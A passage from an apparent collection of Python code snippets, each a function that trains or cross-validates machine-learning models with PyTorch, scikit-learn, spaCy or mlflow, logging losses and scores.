outer_preds_path = os.path.join(defaults.OUTPUT.PREDS_PATH, \"cv_pooled_preds_{}.pkl\".format(exp_name))\n save_obj(outer_preds, outer_preds_path)", "def fit_cv(self, train_loader, val_src, val_trg, device):\r\n\r\n val_src = torch.as_tensor(val_src).float()\r\n val_trg = torch.as_tensor(val_trg).float()\r\n\r\n val_src = val_src.to(device)\r\n val_trg = val_trg.to(device)\r\n\r\n optimizer = optim.Adam(self.parameters(), lr=self.learning_rate)\r\n criterion = torch.nn.MSELoss(reduction='mean')\r\n\r\n history = np.zeros((self.num_epochs, 2))\r\n\r\n for epoch in range(self.num_epochs):\r\n self.train()\r\n train_epoch_loss = 0\r\n for i, (src, trg) in enumerate(train_loader):\r\n src = torch.as_tensor(src).float()\r\n src = src.to(device)\r\n trg = torch.as_tensor(trg).float()\r\n trg = trg.to(device)\r\n\r\n train_output = self.forward(src) # 1x197\r\n\r\n loss = criterion(train_output, trg)\r\n\r\n loss.backward()\r\n optimizer.step()\r\n train_epoch_loss += loss.item()\r\n\r\n\r\n # on validation set\r\n self.eval()\r\n val_output = self.forward(val_src)\r\n loss = criterion(val_output, val_trg)\r\n val_epoch_loss = loss.item()\r\n history[epoch] = [train_epoch_loss/(i+1), val_epoch_loss]\r\n\r\n print('Epoch: {}/{} Train Loss: {:.4f} Validation Loss:{:.4f}'\r\n .format(epoch, self.num_epochs, train_epoch_loss/(i+1), val_epoch_loss))\r\n\r\n if train_epoch_loss/(i+1) < self.threshold:\r\n break\r\n\r\n return history[:epoch]", "def train(self):\r\n self.speaker2index_and_index2speaker()\r\n \"\"\"Initialize history matrix\"\"\"\r\n self.history = np.random.normal(loc=0, scale=0.1, size=(len(self.s2i), config.train.class_history))\r\n \"\"\"\"\"\"\r\n \"\"\"\"\"\"\r\n iterations = 0\r\n \"\"\"Get train/test\"\"\"\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"CTC loss\"\"\"\r\n # self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='mean')\r\n self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='none')\r\n for epoch in range(config.train.num_epochs):\r\n \"\"\"Make dataloader\"\"\"\r\n train_data = Dataset({'files': train, 'mode': 'train', 'metadata_help': metadata_help})\r\n train_gen = data.DataLoader(train_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=train_data.collate, drop_last=True)\r\n val_data = Dataset({'files': val, 'mode': 'train', 'metadata_help': metadata_help})\r\n val_gen = data.DataLoader(val_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=val_data.collate, drop_last=True)\r\n\r\n for batch_number, features in enumerate(train_gen):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n input_lengths = features['input_lengths']\r\n target_lengths = features['target_lengths']\r\n metadata = features[\"metadata\"]\r\n batch_speakers = [x['speaker'] for x in metadata]\r\n self.G = self.G.train()\r\n\r\n #ipdb.set_trace()\r\n \"\"\"Make input_lengths and target_lengths torch ints\"\"\"\r\n input_lengths = input_lengths.to(torch.int32)\r\n target_lengths = target_lengths.to(torch.int32)\r\n phones = phones.to(torch.int32)\r\n\r\n outputs = self.G(spectrograms)\r\n\r\n outputs = outputs.permute(1, 0, 2) # swap batch and sequence length dimension for CTC loss\r\n\r\n loss = self.ctc_loss(log_probs=outputs, targets=phones,\r\n input_lengths=input_lengths, target_lengths=target_lengths)\r\n\r\n \"\"\"Update the loss history\"\"\"\r\n self.update_history(loss, batch_speakers)\r\n if epoch >= config.train.regular_epochs:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[0])\r\n else:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[1])\r\n loss = loss * loss_weights\r\n\r\n # Backward and optimize.\r\n self.reset_grad()\r\n # loss.backward()\r\n loss.sum().backward()\r\n self.g_optimizer.step()\r\n\r\n if iterations % self.log_step == 0:\r\n print(str(iterations) + ', loss: ' + str(loss.sum().item()))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('loss', loss.sum().item(), iterations)\r\n\r\n if iterations % self.model_save_step == 0:\r\n \"\"\"Calculate validation loss\"\"\"\r\n val_loss = self.val_loss(val=val_gen, iterations=iterations)\r\n print(str(iterations) + ', val_loss: ' + str(val_loss))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('val_loss', val_loss, iterations)\r\n \"\"\"Save model checkpoints.\"\"\"\r\n if iterations % self.model_save_step == 0:\r\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(iterations))\r\n torch.save({'model': self.G.state_dict(),\r\n 'optimizer': self.g_optimizer.state_dict()}, G_path)\r\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\r\n\r\n iterations += 1", "def _do_training_cross_validation(self) -> None:\n\n cfg = self.cfg_\n fit_kwargs = {'classes': list(self.data_.classes)}\n\n # Store all of the samples used during cross-validation\n self.y_training_set_all_ = list(self._generate_samples(self.train_ids_, 'y'))\n\n # Initialize learner objects with the optimal set of parameters\n # learned from the grid search round (one for each\n # sub-experiment of the cross-validation round)\n for learner, learner_name in zip(self.learners_, self.learner_names_):\n self.cv_learners_[learner_name] = \\\n [learner(**self.learner_gs_cv_params_[learner_name])\n for i in range(len(self.data_.training_set))]\n\n # Make a list of empty lists corresponding to each estimator\n # instance for each learner, which will be used to store the\n # performance metrics for each cross-validation\n # leave-one-fold-out sub-experiment\n self.cv_learner_stats_ = [[] for _ in cfg.learners]\n\n # Fit the `SelectPercentile` feature selector (if applicable)\n if cfg.feature_selection_percentile != 1.0:\n loginfo('Removing {0}% of the features during training round...'\n .format(100 - 100*cfg.feature_selection_percentile))\n feature_selector = \\\n (SelectPercentile(chi2,\n percentile=100*cfg.feature_selection_percentile)\n .fit(self._vectorize_and_sparsify_data(self.training_vec_,\n self.train_ids_),\n self.y_training_set_all_))\n\n # For each fold of the training set, train on all of the other\n # folds and evaluate on the one left out fold\n for i, held_out_fold in enumerate(self.data_.training_set):\n\n loginfo('Cross-validation sub-experiment #{0} in progress'\n .format(i + 1))\n\n # Use each training fold (except for the held-out set) to\n # incrementally build up the model\n training_folds = (self.data_.training_set[:i]\n + self.data_.training_set[i + 1:])\n y_train_all = []\n for j, training_fold in enumerate(training_folds):\n\n # Get the training data\n y_train = list(self._generate_samples(training_fold, 'y'))\n y_train_all.extend(y_train)\n X_train = self._vectorize_and_sparsify_data(self.training_vec_,\n training_fold)\n if cfg.feature_selection_percentile != 1.0:\n X_train = feature_selector.transform(X_train)\n\n # Iterate over the learners\n for learner_name in self.learner_names_:\n\n # Partially fit each estimator with the new training\n # data (specifying the `classes` keyword argument if\n # this is the first go-round and it's a learner that\n # requires this to be specified initially)\n (self.cv_learners_[learner_name][i]\n .partial_fit(X_train,\n y_train,\n **fit_kwargs if not j and learner_name\n in self.requires_classes_kwarg_\n else {}))\n\n # Get mean and standard deviation for actual values\n y_train_all = np.array(y_train_all)\n y_train_mean = y_train_all.mean()\n y_train_std = y_train_all.std()\n\n # Get test data\n y_test = list(self._generate_samples(held_out_fold, 'y'))\n X_test = self._vectorize_and_sparsify_data(self.training_vec_,\n held_out_fold)\n if cfg.feature_selection_percentile != 1.0:\n X_test = feature_selector.transform(X_test)\n\n # Make predictions with the modified estimators\n for j, learner_name in enumerate(self.learner_names_):\n\n # Make predictions with the given estimator,rounding the\n # predictions\n y_test_preds = \\\n np.round(self.cv_learners_[learner_name][i].predict(X_test))\n\n # Rescale the predicted values based on the\n # mean/standard deviation of the actual values and\n # fit the predicted values within the original scale\n # (i.e., no predicted values should be outside the range\n # of possible values)\n y_test_preds_dict = \\\n ex.rescale_preds_and_fit_in_scale(y_test_preds,\n self.data_.classes,\n y_train_mean,\n y_train_std)\n\n if cfg.rescale:\n y_test_preds = y_test_preds_dict['rescaled']\n else:\n y_test_preds = y_test_preds_dict['fitted_only']\n\n # Evaluate the predictions and add to list of evaluation\n # reports for each learner\n (self.cv_learner_stats_[j]\n .append(ex.evaluate_predictions_from_learning_round(\n y_test=y_test,\n y_test_preds=y_test_preds,\n classes=self.data_.classes,\n prediction_label=cfg.prediction_label,\n non_nlp_features=cfg.non_nlp_features,\n nlp_features=cfg.nlp_features,\n learner=self.cv_learners_[learner_name][i],\n learner_name=learner_name,\n games=cfg.games,\n test_games=cfg.games,\n _round=i + 1,\n iteration_rounds=self.data_.folds,\n n_train_samples=len(y_train_all),\n n_test_samples=len(held_out_fold),\n rescaled=cfg.rescale,\n transformation_string=self.transformation_string_,\n bin_ranges=cfg.bin_ranges)))", "def cross_validation_visualization(lambds, score_tr, score_te):\n plt.semilogx(lambds, score_tr, marker=\".\", color='b', label='train score');\n plt.semilogx(lambds, score_te, marker=\".\", color='r', label='test score');\n plt.xlabel(\"lambda\")\n plt.ylabel(\"score\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation_test\")", "def do_crossval():\n df = read_df()\n # X = df['review'].apply(remove_html_lower)\n\n X = df['review']\n y = df['sentiment']\n X_train, X_holdout, y_train, y_holdout = train_test_split(X, y, test_size=0.3, shuffle=True, stratify=y, random_state=222 )\n\n tfidf = TfidfVectorizer(stop_words='english', min_df=2, max_df=0.8, ngram_range=(1,4))\n stem_pipeline = make_pipeline(TextNormalizer(), tfidf, LogisticRegression(C=100))\n cv = StratifiedShuffleSplit(n_splits=3, test_size=0.2)\n\n scores = cross_val_score(stem_pipeline, X_train, y_train, cv=cv, scoring='accuracy', n_jobs=-1)\n print(scores, scores.mean())", "def cross_validation(self, x, t, k=5):\n print(\"Cross validation of the SVM Model...\")\n\n # Initialize best error / hyperparameters\n best_error = float('inf')\n best_reg = 0\n best_deg = 0\n\n # Cross-validation 80-20\n N = len(x)\n N_train = math.floor(0.8 * N)\n t = t.reshape((N,))\n\n #Initialize the grid search\n\n log_min_reg = np.log(0.001)\n log_max_reg = np.log(1000)\n reg_list = np.logspace(log_min_reg, log_max_reg, num=7, base=math.e)\n\n min_deg = 1\n max_deg = 4\n\n for deg in range(min_deg, max_deg):\n for reg in reg_list:\n errors = np.zeros(k)\n for j in range(k):\n map_index = list(zip(x, t))\n random.shuffle(map_index)\n random_x, random_t = zip(*map_index)\n\n train_x = random_x[:N_train]\n valid_x = random_x[N_train:]\n train_t = random_t[:N_train]\n valid_t = random_t[N_train:]\n\n self.model = SVC(gamma='auto', kernel='poly', degree=deg, C=reg, cache_size=1000)\n self.train(train_x, train_t)\n\n error_valid = np.array([self.error(x_n, t_n) for t_n, x_n in zip(valid_t, valid_x)])\n errors[j] = error_valid.mean()\n\n mean_error = np.mean(errors)\n print(mean_error)\n if mean_error < best_error:\n best_error = mean_error\n best_reg = reg\n best_deg = deg\n print(\"The new best hyper parameters are : \", best_reg, best_deg)\n\n print(\"Best hyper parameters are : \", best_reg, best_deg)\n print(\"Validation error : \", 100 * best_error, \"%\")\n self.model = SVC(gamma='auto', kernel='poly', degree=best_deg, C=best_reg)\n self.train(x, t)", "def cross_train_module(\n model: nn.Module,\n dataset: Union[NumpyArrayTuple, torch.utils.data.Dataset],\n loss_fxn,\n optimizer: torch.optim.Optimizer,\n device: torch.device,\n validation_split: float = 0.0,\n validation_dataset: Union[NumpyArrayTuple, torch.utils.data.Dataset] = None,\n metrics_map: MetricsMapType = None,\n epochs: int = 5,\n batch_size: int = 64,\n l1_reg: float = None,\n reporting_interval: int = 1,\n lr_scheduler: Union[LRSchedulerType, ReduceLROnPlateauType] = None,\n early_stopping: EarlyStopping = None,\n shuffle: bool = True,\n num_workers: int = 0,\n verbose: bool = True,\n) -> MetricsHistory:\n # validate parameters passed into function\n assert 0.0 <= validation_split < 1.0, \"cross_train_module: 'validation_split' must be a float between (0.0, 1.0]\"\n if loss_fxn is None:\n raise ValueError(\"cross_train_module: 'loss_fxn' cannot be None\")\n if optimizer is None:\n raise ValueError(\"cross_train_module: 'optimizer' cannot be None\")\n\n reporting_interval = 1 if reporting_interval < 1 else reporting_interval\n reporting_interval = 1 if reporting_interval >= epochs else reporting_interval\n\n train_dataset, val_dataset = dataset, validation_dataset\n\n if isinstance(train_dataset, tuple):\n # train dataset was a tuple of np.ndarrays - convert to Dataset\n torch_X_train = torch.from_numpy(train_dataset[0]).type(torch.FloatTensor)\n torch_y_train = torch.from_numpy(train_dataset[1]).type(\n torch.LongTensor if train_dataset[1].dtype in [np.int, np.long] else torch.FloatTensor\n )\n train_dataset = torch.utils.data.TensorDataset(torch_X_train, torch_y_train)\n\n if (val_dataset is not None) and isinstance(val_dataset, tuple):\n # cross-val dataset was a tuple of np.ndarrays - convert to Dataset\n torch_X_val = torch.from_numpy(val_dataset[0]).type(torch.FloatTensor)\n torch_y_val = torch.from_numpy(val_dataset[1]).type(\n torch.LongTensor if val_dataset[1].dtype in [np.int, np.long] else torch.FloatTensor\n )\n val_dataset = torch.utils.data.TensorDataset(torch_X_val, torch_y_val)\n\n # split the dataset if validation_split > 0.0\n if (validation_split > 0.0) and (validation_dataset is None):\n # NOTE: validation_dataset supersedes validation_split!!\n # Use validation_split only if validation_dataset is None\n train_dataset, val_dataset = split_dataset(train_dataset, validation_split)\n\n if val_dataset is not None:\n print(\n f\"Cross training on '{device}' with {len(train_dataset)} training and \"\n + f\"{len(val_dataset)} cross-validation records...\",\n flush=True,\n )\n else:\n print(f\"Training on '{device}' with {len(train_dataset)} records...\", flush=True)\n\n if reporting_interval != 1:\n print(f\"NOTE: progress will be reported every {reporting_interval} epoch!\")\n\n l1_penalty = None if l1_reg is None else torch.nn.L1Loss()\n if l1_reg is not None:\n print(f\"Adding L1 regularization with lambda = {l1_reg}\")\n\n history = None\n\n try:\n model = model.to(device)\n tot_samples = len(train_dataset)\n len_num_epochs, len_tot_samples = len(str(epochs)), len(str(tot_samples))\n # create metrics history\n history = MetricsHistory(metrics_map, (val_dataset is not None))\n train_batch_size = batch_size if batch_size != -1 else len(train_dataset)\n\n for epoch in range(epochs):\n model.train()\n # reset metrics\n history.clear_batch_metrics()\n # loop over records in training dataset (use DataLoader)\n train_dataloader = torch.utils.data.DataLoader(\n train_dataset, batch_size=train_batch_size, shuffle=shuffle, num_workers=num_workers\n )\n num_batches, samples = 0, 0\n\n for batch_no, (X, y) in enumerate(train_dataloader):\n X = X.to(device)\n y = y.to(device)\n # clear accumulated gradients\n optimizer.zero_grad()\n # make forward pass\n preds = model(X)\n # calculate loss\n loss_tensor = loss_fxn(preds, y)\n # add L1 if mentioned - L2 Regularization is handled by optimizer!\n if l1_reg is not None:\n reg_loss = 0\n for param in model.parameters():\n reg_loss += l1_penalty(param)\n loss_tensor += reg_loss * l1_reg\n # compute gradients\n loss_tensor.backward()\n # update weights\n optimizer.step()\n\n # compute batch metric(s)\n preds = preds.to(device)\n history.calculate_batch_metrics(preds.to(\"cpu\"), y.to(\"cpu\"), loss_tensor.item(), val_metrics=False)\n\n num_batches += 1\n samples += len(X)\n\n if (reporting_interval == 1) and verbose:\n # display progress with batch metrics - will display line like this:\n # Epoch ( 3/100): ( 45/1024) -> loss: 3.456 - acc: 0.275\n metricsStr = history.get_metrics_str(batch_metrics=True, include_val_metrics=False)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n end=\"\",\n flush=True,\n )\n else:\n # all train batches are over - display average train metrics\n history.calculate_epoch_metrics(val_metrics=False)\n if val_dataset is None:\n if (epoch == 0) or ((epoch + 1) % reporting_interval == 0) or ((epoch + 1) == epochs):\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=False)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n flush=True,\n )\n # training ends here as there is no cross-validation dataset\n else:\n # we have a validation dataset\n # same print as above except for trailing ... and end=''\n if (epoch == 0) or ((epoch + 1) % reporting_interval == 0) or ((epoch + 1) == epochs):\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=False)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s...\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n end=\"\",\n flush=True,\n )\n\n val_batch_size = batch_size if batch_size != -1 else len(val_dataset)\n model.eval()\n with torch.no_grad():\n # val_dataloader = None if val_dataset is None else \\\n val_dataloader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=val_batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n )\n num_val_batches = 0\n\n for val_X, val_y in val_dataloader:\n val_X = val_X.to(device)\n val_y = val_y.to(device)\n val_preds = model(val_X)\n val_batch_loss = loss_fxn(val_preds, val_y).item()\n history.calculate_batch_metrics(\n val_preds.to(\"cpu\"),\n val_y.to(\"cpu\"),\n val_batch_loss,\n val_metrics=True,\n )\n num_val_batches += 1\n else:\n # loop over val_dataset completed - compute val average metrics\n history.calculate_epoch_metrics(val_metrics=True)\n # display final metrics\n if (epoch == 0) or ((epoch + 1) % reporting_interval == 0) or ((epoch + 1) == epochs):\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=True)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n flush=True,\n )\n\n if (early_stopping is not None) and (val_dataset is not None):\n # early stooping test only if validation dataset is used\n monitored_metric = early_stopping.monitored_metric()\n last_metric_val = history.metrics_history[monitored_metric][\"epoch_vals\"][-1]\n early_stopping(model, last_metric_val, epoch)\n if early_stopping.early_stop:\n # load last state\n model.load_state_dict(torch.load(early_stopping.checkpoint_path()))\n model.eval()\n break\n\n # step the learning rate scheduler at end of epoch\n if (lr_scheduler is not None) and (epoch < epochs - 1):\n # have to go to these hoops as ReduceLROnPlateau requires a metric for step()\n if isinstance(lr_scheduler, torch.optim.lr_scheduler.ReduceLROnPlateau):\n lr_metric = (\n history.metrics_history[\"loss\"][\"epoch_vals\"][-1]\n if val_dataset is not None\n else history.metrics_history[\"val_loss\"][\"epoch_vals\"][-1]\n )\n lr_scheduler.step(lr_metric)\n else:\n lr_scheduler.step()\n\n return history\n finally:\n model = model.to(\"cpu\")", "def crossValidatePredictor(X,y,clfinputs,logfile='cvout.log'):\n \n models,modelcvs,preds,probs = [],[],[],[]\n scores = dict([(key,[]) for key in list(scorefn.keys())])\n errors = dict([(key,[]) for key in list(errorfn.keys())])\n\n # validate class labels\n uy = np.unique(y)\n if len(uy) != 2:\n print('error: need 2 classes for classification!')\n return {}\n \n N,ymin = len(y),uy[0]\n\n if cv_type == 'loo':\n cv = KFold(N,n_folds=N,random_state=train_state)\n y_pred = np.zeros(N)\n y_prob = np.zeros(N)\n else: \n cv = StratifiedKFold(y,n_folds=train_folds,random_state=train_state)\n\n n_folds = len(cv) \n model_id = clfinputs['clf_type']\n widgets = ['%s cv: '%cv_type, Percentage(), ' ', Bar('='), ' ', ETA()]\n pbar = ProgressBar(widgets=widgets, maxval=n_folds+(cv_type=='loo')).start()\n with open(logfile,'w') as logfid:\n cv_test_index = []\n scorekeys = sorted(scores.keys())\n for i,(train_index,test_index) in enumerate(cv):\n pbar.update(i)\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n cv_test_index.extend(test_index) \n \n # xgb assumes labels \\in {0,1}\n if model_id == 'xgb' and ymin == -1: \n y_train[y_train==-1] = 0 \n\n # train/predict as usual\n clf,clf_cv = train(X_train,y_train,clfinputs)\n clf_pred = clf.predict(X_test)\n if model_id == 'xgb' and ymin == -1:\n clf_pred[clf_pred==0] = -1\n\n if cv_probs:\n clf_prob = clf.predict_proba(X_test)[:,0]\n else:\n clf_prob = np.ones(len(clf_pred))*np.nan\n \n # loo predicts one label per 'fold'\n if cv_type == 'loo':\n\n y_pred[test_index] = clf_pred\n y_prob[test_index] = clf_prob\n # compute scores for the points we've classified thus far\n y_test_cur = np.atleast_1d(y[cv_test_index])\n y_pred_cur = np.atleast_1d(y_pred[cv_test_index])\n \n for score,score_fn in list(scorefn.items()):\n scorei = score_fn(y_test_cur,y_pred_cur,uy)\n scores[score] = [scorei] \n else:\n # collect output for all test samples in this fold\n for score,score_fn in list(scorefn.items()):\n scorei = score_fn(y_test,clf_pred,uy)\n scores[score].append(scorei) \n preds.append(clf_pred)\n probs.append(clf_prob)\n models.append(clf)\n modelcvs.append(clf_cv)\n for error,error_fn in list(errorfn.items()):\n errors[error].append(error_fn(y_test,clf_pred))\n\n if i==0:\n scorenames = ['%-16s'%score for score in scorekeys]\n logstr = '%-8s %s'%('i',''.join(scorenames))\n else:\n curscores = ['%-16.4f'%(np.mean(scores[score]))\n for score in scorekeys] \n logstr = '%-8.3g %s'%(i,''.join(curscores))\n print(logstr,file=logfid,flush=True)\n\n # train full model for loo cv, score on loo preds from above\n if cv_type == 'loo':\n for score,score_fn in list(scorefn.items()): \n scores[score] = [score_fn(y,y_pred,uy)]\n for error,error_fn in list(errorfn.items()):\n errors[error] = [error_fn(y,y_pred)]\n\n clf,clf_cv = train(X,y,clfinputs)\n models = [clf]\n modelcvs = [clf_cv]\n preds = [y_pred]\n probs = [y_prob]\n pbar.update(i+1)\n pbar.finish() \n\n # output scores ordered by key\n for score_id in scorekeys:\n score_vals = scores[score_id]\n print('mean %s: %7.4f (std=%7.4f)'%(score_id, np.mean(score_vals),\n np.std(score_vals)))\n\n return {'preds':preds,'probs':probs,'scores':scores,'errors':errors,\n 'models':models,'modelcvs':modelcvs}", "def train_model_cross_validation(model, train_docs, test_docs, nb_iter, output_dir, spacy_type = True, nb_folds = 5):\n\n print(output_dir)\n os.mkdir(output_dir) # creating the output directory\n print(\" ============= TRAINING MODEL ===========================\")\n\n\n # tuple conversion (the tuple type is lost when dataframe -> excel -> dataframe)\n\n #docs['annotations'] = [[tuple(ann) for ann in annotations] for annotations in docs['annotations'].to_numpy()]\n\n\n # cross validation :\n\n models = []\n all_scores = []\n\n kf = KFold(n_splits=nb_folds)\n c = 0\n for train_index, val_index in kf.split(train_docs):\n\n train_data = train_docs.iloc[train_index, :]\n val_data = train_docs.iloc[val_index, :]\n\n # spacy_format\n TRAIN_DATA = [(text, {'entities': entities}) for [text, entities] in train_data[['text', 'annotations']].to_numpy()]\n\n # trim entities : leading whitespace make the model bug\n TRAIN_DATA = trim_entity_spans(TRAIN_DATA)\n\n # loading of the model\n nlp = model\n\n optimizer = nlp.begin_training()\n\n # get names of other pipes to disable them during training\n pipe_exceptions = [\"ner\" ] #\"trf_wordpiecer\", \"trf_tok2vec\"\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n\n scores = []\n\n # training\n with nlp.disable_pipes(*other_pipes): # only train NER\n\n if not spacy_type : # add the other labels\n ner = nlp.get_pipe(\"ner\")\n ner.add_label('AGE_RELATED')\n ner.add_label('DURATION')\n ner.add_label('FREQUENCY')\n ner.add_label('OTHER')\n\n for i in range(nb_iter):\n\n print('Iteration ', i)\n print()\n losses = {}\n random.shuffle(TRAIN_DATA) # ??\n\n path = ''\n if spacy_type:\n path = 'spacy_model_' + str(c) + '_fold'\n else:\n path = 'all_types_model_' + str(c) + '_fold'\n\n batches = minibatch(TRAIN_DATA, size=1) #compounding(4.0, 20.0, 1.001)\n\n for batch in batches:\n texts, annotations = zip(*batch)\n try:\n nlp.update(texts, annotations, sgd = optimizer, drop=0.5, losses = losses)\n print(\"Losses\", losses)\n except Exception as e:\n print(e)\n #print(text)\n\n tp_g, fp_g, fn_g, p, r, f, pt, rt, ft, type_dict = test_model(test_docs, nlp)\n scores += [(p, r, r, pt, rt, ft)]\n print()\n print()\n\n # test the trained model\n test_model(val_data, nlp)\n\n df_scores = pd.DataFrame(scores, columns = ['span_precision', 'span_recall', 'span_f1', 'type_precision', 'type_recall', 'type_f1'])\n df_scores.to_excel(output_dir + '/' + path + '.xlsx')\n\n\n models += [nlp]\n all_scores += [scores]\n # save model to output directory\n if output_dir is not None:\n nlp.to_disk(output_dir + '/' + path)\n print(\"Saved model to\", output_dir + '/' + path)\n\n c += 1\n\n return models, all_scores", "def train_model(\r\n train_x: pd.DataFrame,\r\n train_y: pd.DataFrame,\r\n parameters: Dict[str, Any]\r\n) -> sklearn_Pipeline:\r\n # Build a multi-class logistic regression model\r\n model_params = parameters['model_params']\r\n model = LogisticRegression(**model_params)\r\n\r\n if parameters['model_standard_scaler']:\r\n # Prepare column transformer to do scaling\r\n col_transformer = ColumnTransformer(\r\n [\r\n (\r\n 'standard_scaler',\r\n StandardScaler(copy=False),\r\n [\r\n \"sepal_length\",\r\n \"sepal_width\",\r\n \"petal_length\",\r\n \"petal_width\",\r\n ],\r\n ),\r\n ],\r\n remainder='drop',\r\n )\r\n\r\n # Make pipeline w/ scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('col_transformer', col_transformer),\r\n ('model', model),\r\n ]\r\n )\r\n else:\r\n # Make pipeline w/o scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('model', model),\r\n ]\r\n )\r\n\r\n # Fit\r\n model_pipeline.fit(train_x, train_y)\r\n\r\n mlflow.set_experiment('iris-example')\r\n mlflow_sklearn.log_model(sk_model=model_pipeline, artifact_path=\"model\")\r\n mlflow.log_params(model_params)\r\n\r\n # Print out the model pipeline\r\n # See: http://www.xavierdupre.fr/app/mlinsights/helpsphinx/notebooks/visualize_pipeline.html\r\n dot = pipeline2dot(model_pipeline, train_x)\r\n dot_filename = 'pipeline_dot.dot'\r\n with open(dot_filename, 'w', encoding='utf-8') as f:\r\n f.write(dot)\r\n if sys.platform.startswith(\"win\") and \"Graphviz\" not in os.environ[\"PATH\"]:\r\n os.environ['PATH'] = os.environ['PATH'] + r';C:\\Program Files (x86)\\Graphviz2.38\\bin'\r\n cmd = \"dot -G=300 -Tpng {0} -o{0}.png\".format(dot_filename)\r\n run_cmd(cmd, wait=True, fLOG=print)\r\n mlflow.log_artifact('{0}.png'.format(dot_filename), 'model')\r\n\r\n return model_pipeline", "def crossValidationKfold(automodel, \r\n X, y,\r\n params_automl : dict = {},\r\n score_function = accuracy_score,\r\n cv : int = 3,\r\n shuffle: bool = True,\r\n verbose : bool = True,\r\n allmetrics: bool = False):\r\n if(isinstance(X, pd.DataFrame) or isinstance(y, pd.DataFrame)):\r\n X = X.values\r\n y = y.values\r\n skf = StratifiedKFold(n_splits = cv, \r\n shuffle = shuffle, \r\n random_state = 42)\r\n if(allmetrics):\r\n train_scores = {'accuracy' : [], \r\n 'roc_auc': [], \r\n 'f1' : [], \r\n 'recall' : [], \r\n 'precision': []}\r\n test_scores = {'accuracy' : [], \r\n 'roc_auc': [], \r\n 'f1' : [], \r\n 'recall' : [], \r\n 'precision': []}\r\n else:\r\n train_scores = np.empty((cv, ))\r\n test_scores = np.empty((cv, ))\r\n for idx, (idx_tr, idx_ts) in enumerate(skf.split(X, y)):\r\n X_tr, X_ts = X[idx_tr], X[idx_ts]\r\n y_tr, y_ts = y[idx_tr], y[idx_ts] \r\n am = automodel(**params_automl)\r\n am.fit(X_tr, y_tr)\r\n if(not allmetrics):\r\n \r\n train_scores[idx] = score_function(am.predict(X_tr), y_tr)\r\n test_scores[idx] = score_function(am.predict(X_ts), y_ts)\r\n if(verbose):\r\n print('it: {} train score: {:.3f}, val score: {:.3f}'.format(idx, \r\n train_scores[idx],\r\n test_scores[idx]))\r\n else:\r\n train_current = {}\r\n test_current = {}\r\n for name, metric in all_metrics_classifications.items():\r\n train_current[name] = metric(am.predict(X_tr), y_tr)\r\n test_current[name] = metric(am.predict(X_ts), y_ts)\r\n train_scores[name].append(train_current[name])\r\n test_scores[name].append(test_current[name])\r\n \r\n if(verbose):\r\n print('it: {} train scores: {}, val scores: {}'.format(idx, train_current,\r\n test_current))\r\n\r\n if(not allmetrics):\r\n return test_scores.mean(), test_scores.std()\r\n else:\r\n # -- calculate means of all metrics-- #\r\n return dict(map(lambda kv: (kv[0], np.asarray(kv[1]).mean()), test_scores.items()))", "def validate(model, dataloader, idx_to_char, device, config):\n\n validation_cer = test(model, dataloader, idx_to_char, device, config, with_analysis=False, plot_all=False, validation=True, with_iterations=False)\n LOGGER.info(f\"Validation CER: {validation_cer}\")\n\n if config['lowest_loss'] > validation_cer:\n if config[\"validation_jsons\"]:\n test_cer = test(config[\"model\"], config.test_dataloader, config[\"idx_to_char\"], config[\"device\"], config,\n validation=False, with_iterations=False)\n LOGGER.info(f\"Saving Best Loss! Test CER: {test_cer}\")\n else:\n test_cer = validation_cer\n\n config['lowest_loss'] = validation_cer\n save_model(config, bsf=True)\n return validation_cer", "def model_train(fold_name, model_dir, model_dict, dataset_path, development_subj, mu, sigma):\n valid_frames_before=200\n valid_frames_after=0\n valid_batch_size=8\n generators = TXT_Train_Validation_Generators(dataset_path=dataset_path, subject_list=development_subj, train_size=model_dict[\"train_set_ratio\"], frames_before=model_dict[\n 